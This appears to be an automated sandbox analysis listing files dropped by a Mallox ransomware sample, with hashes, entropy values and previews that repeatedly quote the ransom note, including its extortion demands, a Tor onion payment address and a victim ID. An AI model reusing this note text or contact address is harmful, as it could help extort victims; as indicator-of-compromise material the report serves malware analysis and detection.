                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Public Key
                    Category:dropped
                    Size (bytes):32876
                    Entropy (8bit):7.993761180141098
                    Encrypted:true
                    SSDEEP:768:AV0JPcPKgzX24mBkoA4K798o0JkUqMA3KnIc3fkW8sY0XeWbS0SeFdidDxP:AVDFjJmyoG0Jk53KhPXeWbS05idDB
                    MD5:06A52AAFB0D1C1C67089069B2AFD1E0E
                    SHA1:E9646EDF34AD4A8D90E3802647E7A688A01DCC3F
                    SHA-256:CD6CF25DA8C833F02131A550AF1B5697287C918BACF780F474CE253CE3876988
                    SHA-512:9E8EC0C3D8803CDE47201D7F189750F4C1632923855218638548480F3633D6911F646CE8C0AD13B4F8A508F8233EE664635C003835AF5C007F78AFDB3C50D371
                    Malicious:true
                    Preview:.v."....x(....q..7|p3..RI:.... w.d.oh1U.C....]....%.f.].a).`;..qf.w.D..O....>..J....&.%....[F.LI,.......B.>.W(....B.........l.3...q......H"C....q-=N..)....H..H..x.Z.}:J.V/.......B.%(.@zq.......B".VE@...*.M.+.4...B....2.7B....._.LR?.o.....XS..s..*].....[....>.Yt.......id~........Tp...q..O^..`..ro.*..B....#.e'>l......^$.?..:......o1@6..O...I...PQ.....-....x..P....G|[.1N........1)...!L........kW.._..l[..Fb.r..X.....U./..Q..dX.w........j..1J...i.21f.......@?+>...#;.YQ...{.SO...<..|.X......Z^ILLk.l.@[,.a...+b.Z..$b.Y...n.......!.....J.R..s.Q.\tI....-...m......`8<=...i....yn.......c....rr.....oRw...x....Pu.0.........XY..dD.P......g'.=)1..-7..&..7O..UY' .}hs_.}.#....W1.M.iY.e...D.tZ..%.-...]%Y?..!.n_4.... .5lZb..k.H...c..m.!,.9.x;&....V.}.,..4{Po.(c.u4.$..S7.UY>k.....3..{.]...p..B....r.!.!.U....t.....Oj.'9...V.......P.Y.G.=k.!;..3X.N1.Z.Y.}..v7..!<U..R(SR.....;.D..4I.X...(...Z..E........i...@...5g.,T..>u.] ..<8...J..O9.Z..".p6..../.%..p..z...IN[w.......,.

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1339140
                    Entropy (8bit):7.999859864014468
                    Encrypted:true
                    SSDEEP:24576:13T0aZFWX0ZelaLhd+JTB78GjJKWf7NseHdbTufFQ47qM2WQpwfPU:94X0o7B7lNf7NsybCfFN7WWnfc
                    MD5:636008F215BC0AE74D19ABA04C56BCC0
                    SHA1:F558D4BAFA9F1922079637973ED3E54E29B6DB71
                    SHA-256:0B9B86C70AAED8F4D1502DDE5EC2AAE57DD6F2ADD5B210182F193BCC69B6A91C
                    SHA-512:B4E15796BDE3CE26D3D51C094892DBC5E7F14006F5EFD61EA34503DE6BBE34AA6ADAB9D6D188E78CD7017195A927132428F574A6C9A072D700565DE8BD6719C0
                    Malicious:true
                    Preview:.u..=?...l6....K.H...;=$hV.r..l.A.F$.....AO..XM...U#...A}+B.[..Xa. ..w1..^..^.AyA..E.U..t...V...t.\ok.L.T..`G,.r.2..q./F...>..&O.=........'=.'..YH.....[).!6...?....Q?[.e...A...B..D.MN.....?..?.._@.N..).._6.;(.5N...^sS...*5 ..0...V..r.#.L......H.Y@.... @.k&...0}....0F7.X ..n...]..x....C.......*.O..."?g.....e.....iE....u..`..r;.........j.Jr..01.l.<...|.......=U.e.......q..l3.=....D&...p...Q..p"......4xQ..L....[\.h...V...,H.....&....h...^..U...%......!.....J....u......r.....]{&w....._.^.P.B...Z.LS..C4..6iv.#..4...t.#......$.&....0.2.=M^Y.d..........1.......oV.(.R....j.k. @:.s..4..2...-$..R.'h.@,...{..|B......!....k.........B...[..VmHj.......l.R.Oa{...d.v.h..5....X..%...1o:.........e@.SW7...6|o... .._..F.b5.gx..u<?..qh.....ib....k..w.1>I..Q.......+~...Z..g6%..U.........5~.UT....s.u.0....9;&..MeB>.....l.{]<J`p.[.-HPaA....T...8Q.....N..k...v..........1.W....Q.....~.../8....{...g^:..F.c,........!.`...Z..".bC.-...%..8.Bc.,....e......s....

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
